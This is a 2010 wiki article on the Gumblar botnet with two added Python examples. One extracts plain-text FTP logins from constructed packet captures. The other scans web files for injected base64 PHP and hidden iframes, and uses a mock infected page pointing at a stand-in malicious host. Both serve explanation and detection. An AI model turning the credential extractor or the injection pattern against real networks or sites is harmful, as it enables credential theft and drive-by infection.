Gumblar: Difference between revisions
Edit summary (minor edit): Added a site that explains more info on Gumblar.
Revision as of 23:10, 17 June 2010
Gumblar is the name given by ScanSafe, and Troj/JSRedir-R the name given by Sophos,[1] to a botnet that first appeared in 2009. It is characterized by redirecting users' Google searches and is suspected[citation needed] to spread through Adobe Flash and PDF files.
Removal
Removal instructions and further information on Gumblar are collected at http://www.gumblar.webs.com, which also covers the ILOVEYOU and Conficker viruses. Because the web-server side of the infection is driven by stolen FTP credentials (see below), cleaning the injected files alone is not sufficient: the administrator's machine that leaked the credentials must also be cleaned and the FTP passwords changed, or the site is simply re-infected.
Infection
Windows Personal Computers
Visitors to an infected site are redirected to a second site hosting further malware; this was originally gumblar.cn but has since moved across a variety of domains. That site serves the visitor a malicious PDF, which is opened by the browser or by Acrobat Reader. The PDF exploits a known vulnerability in Acrobat Reader to execute code on the visitor's computer.
The malware then searches for FTP clients such as FileZilla and Dreamweaver and harvests the credentials they have stored. It also puts the network card into promiscuous mode so that it can sniff local network traffic for FTP logins, which FTP sends unencrypted. It is one of the first pieces of malware to incorporate an automated network sniffer.
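The sniffing step above works because FTP transmits the login on its control channel in plain text. The following Python, added here as an illustration and not code from the article or from Gumblar itself, reassembles client-to-server traffic to TCP port 21 from a constructed packet list and pulls out the USER/PASS pairs, which is exactly the data a host in promiscuous mode on the same segment can collect. The IP addresses, credentials and packets are all made up.

```python
"""
Added example (not part of the original article): what a sniffer on the
local network sees when an FTP client logs in. FTP sends USER and PASS on
the control channel (TCP port 21) as plain text, so any host that can read
the traffic can reassemble the login. All packets below are constructed.
"""
from collections import defaultdict

FTP_CONTROL_PORT = 21

# Constructed packets: (src_ip, dst_ip, dst_port, tcp_payload), in capture order.
CAPTURE = [
    ("192.168.1.20", "203.0.113.10", 21, b"USER webmaster\r\n"),
    ("203.0.113.10", "192.168.1.20", 49152, b"331 Password required for webmaster\r\n"),
    ("192.168.1.20", "203.0.113.10", 21, b"PASS hunter2\r\n"),
    ("203.0.113.10", "192.168.1.20", 49152, b"230 Login successful\r\n"),
    # A second client whose PASS command is split across two TCP segments.
    ("192.168.1.21", "203.0.113.10", 21, b"USER designer\r\nPASS dre"),
    ("192.168.1.21", "203.0.113.10", 21, b"amweaver!\r\n"),
    # Unrelated TLS traffic on port 443 is opaque to the sniffer (constructed bytes).
    ("192.168.1.22", "198.51.100.5", 443, b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03"),
]


def extract_ftp_credentials(packets):
    """Reassemble client->server FTP control streams and pull out USER/PASS pairs.

    Returns a list of (client_ip, server_ip, username, password) tuples in the
    order the streams were first seen.
    """
    # Concatenate payloads per (client, server) so commands split across
    # segments are seen whole. Only traffic *to* port 21 carries commands.
    streams = defaultdict(bytes)
    for src, dst, dport, payload in packets:
        if dport == FTP_CONTROL_PORT:
            streams[(src, dst)] += payload

    found = []
    for (client, server), data in streams.items():
        user = None
        for line in data.split(b"\r\n"):
            cmd, _, arg = line.partition(b" ")
            cmd = cmd.upper()
            if cmd == b"USER":
                user = arg.decode("utf-8", "replace")
            elif cmd == b"PASS" and user is not None:
                found.append((client, server, user, arg.decode("utf-8", "replace")))
                user = None
    return found


if __name__ == "__main__":
    for client, server, user, password in extract_ftp_credentials(CAPTURE):
        print(f"{client} -> {server}: {user} / {password}")
```

Because the extractor keys only on the FTP control port, the TLS record at the end of the sample yields nothing: the same login made over FTPS or SFTP is opaque to a passive sniffer, which is the practical defence against this stage of the attack.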
Servers
Using the credentials stolen from site administrators' machines, the attackers log in to each website over FTP and infect it. Large portions of the site are downloaded, malicious code is injected into the files, and the modified files are uploaded back to the server. The code is inserted into any file that contains a <body> tag, such as HTML, PHP, JavaScript, ASP and ASPX files. The inserted PHP code contains base64-encoded JavaScript that infects the computers of visitors who execute it. In addition, some pages have inline frames (iframes) inserted into them; this iframe code typically contains hidden links to malicious websites.[1] The malware also modifies .htaccess and HOSTS files and creates images.php files in directories named 'images'. The infection is not a server-wide exploit: it affects only those sites on the server for which the attackers hold credentials.
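The injection described above leaves two recognisable traces in the files on the server: a PHP block that passes a base64-encoded blob to base64_decode() and executes it, and an inline frame styled so the visitor never sees it, plus a dropped images.php in an images directory. The scanner below is an added example written for this page; it is not one of the removal tools cited in the references and does not reproduce Gumblar's actual injected code, whose exact form the article does not give. The regular expressions are heuristics, and the sample pages, domains and file names are constructed.

```python
"""
Added example (not part of the original article or of the cited removal
tools): scan a web root for the injection patterns the text describes.
Heuristics, sample pages and domains are constructed for illustration.
"""
import base64
import os
import re

# File types the text says receive injected code (anything that may hold <body>).
SCAN_EXTENSIONS = {".html", ".htm", ".php", ".js", ".asp", ".aspx"}

# A PHP block that decodes a base64 blob and executes or echoes it.
PHP_B64 = re.compile(
    r"<\?php\s+(?:eval|echo)\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]",
    re.IGNORECASE,
)
# An iframe whose style or dimensions hide it from the visitor.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*(?:visibility\s*:\s*hidden|display\s*:\s*none|width\s*=\s*['\"]?[01]\b)[^>]*>",
    re.IGNORECASE,
)
# What the decoded blob must contain to count as injected client-side code.
SCRIPTISH = re.compile(r"<(?:script|iframe)\b|document\.write", re.IGNORECASE)


def scan_content(path, text):
    """Return (path, kind, detail) findings for the content of one file."""
    findings = []
    for m in PHP_B64.finditer(text):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("latin-1")
        except ValueError:  # binascii.Error is a ValueError: not valid base64
            continue
        if SCRIPTISH.search(decoded):
            findings.append((path, "base64-js", decoded[:60]))
    for m in HIDDEN_IFRAME.finditer(text):
        src = re.search(r"src\s*=\s*['\"]([^'\"]+)", m.group(0), re.IGNORECASE)
        findings.append((path, "hidden-iframe", src.group(1) if src else m.group(0)[:60]))
    return findings


def scan_tree(root):
    """Walk a web root and collect findings, including dropped images/images.php files."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if name.lower() == "images.php" and os.path.basename(dirpath).lower() == "images":
                findings.append((rel, "dropped-file", "images.php in an images directory"))
            if os.path.splitext(name)[1].lower() not in SCAN_EXTENSIONS:
                continue
            with open(full, encoding="utf-8", errors="replace") as fh:
                findings.extend(scan_content(rel, fh.read()))
    return findings


# Constructed sample pages: one carrying both injection forms, one clean.
INJECTED_JS = b"<script>document.write('<iframe src=\"http://malicious.example/\" width=1 height=1></iframe>')</script>"
SAMPLE_PAGE = (
    "<html><body><h1>Hello</h1>\n"
    "<?php eval(base64_decode('" + base64.b64encode(INJECTED_JS).decode() + "')); ?>\n"
    "<iframe src=\"http://malicious.example/in.php\" style=\"visibility:hidden\"></iframe>\n"
    "</body></html>"
)
CLEAN_PAGE = "<html><body><p>Nothing to see.</p><iframe src=\"https://example.org/widget\"></iframe></body></html>"


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "images"))
        open(os.path.join(root, "images", "images.php"), "w").close()
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write(SAMPLE_PAGE)
        with open(os.path.join(root, "about.html"), "w") as fh:
            fh.write(CLEAN_PAGE)
        for path, kind, detail in scan_tree(root):
            print(f"{path}: {kind}: {detail}")
```

Decoding the blob before deciding is what keeps the scanner honest: a base64 string on its own is not evidence, since legitimate sites embed encoded images and data, but a blob that decodes to a script or iframe tag inside an eval() is. The iframe rule is deliberately narrow (hidden styling or a 0/1 pixel width) so ordinary embedded widgets such as the one in CLEAN_PAGE are not reported.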
Gumblar variants
Different vendors use different names for Gumblar and its variants.[2] Initially the malware connected to the gumblar.cn domain, but that server was later shut down.[citation needed] Many variants have emerged since, connecting to a range of malicious servers via injected iframe code.[citation needed] Whatever their other differences, all Gumblar variants can be categorized as iframe viruses.[citation needed]
Gumblar resurfaced in January 2010, stealing FTP usernames and passwords and infecting HTML, PHP and JavaScript files on web servers to help spread itself.[3][4]
References
- ^ Broersma, Matthew. "'Gumblar' attacks spreading quickly". CNET News. http://news.cnet.com/8301-1009_3-10244529-83.html. Retrieved 24 November 2009.
- ^ "Gumblar variants".
- ^ "Gumblar-family virus removal tool".
- ^ "PERL Script to remove Gumblar".
- Binning, David (15 May 2009). "Reports of Gumblar's death greatly exaggerated". Computer Weekly. Retrieved 7 July 2009.
- Staff (15 May 2009). "New computer virus on rise, warn security experts". The Telegraph (London). Retrieved 7 July 2009.
- Leyden, John (19 May 2009). "Gumblar Google-poisoning attack morphs". The Register. Retrieved 7 July 2009.
- Johnson, Bobbie (22 May 2009). "'Gumblar' PC virus targets Google users, warn experts". The Guardian (London). Retrieved 7 July 2009.
- Mills, Elinor (29 May 2009). "Gumblar attack worse than Conficker, experts warn". ZDNet. CBS Interactive Inc. Retrieved 7 July 2009.
- Dinham, Peter (7 July 2009). "Riding the Net risks drive-by malware download attack". iTWire. Retrieved 7 July 2009.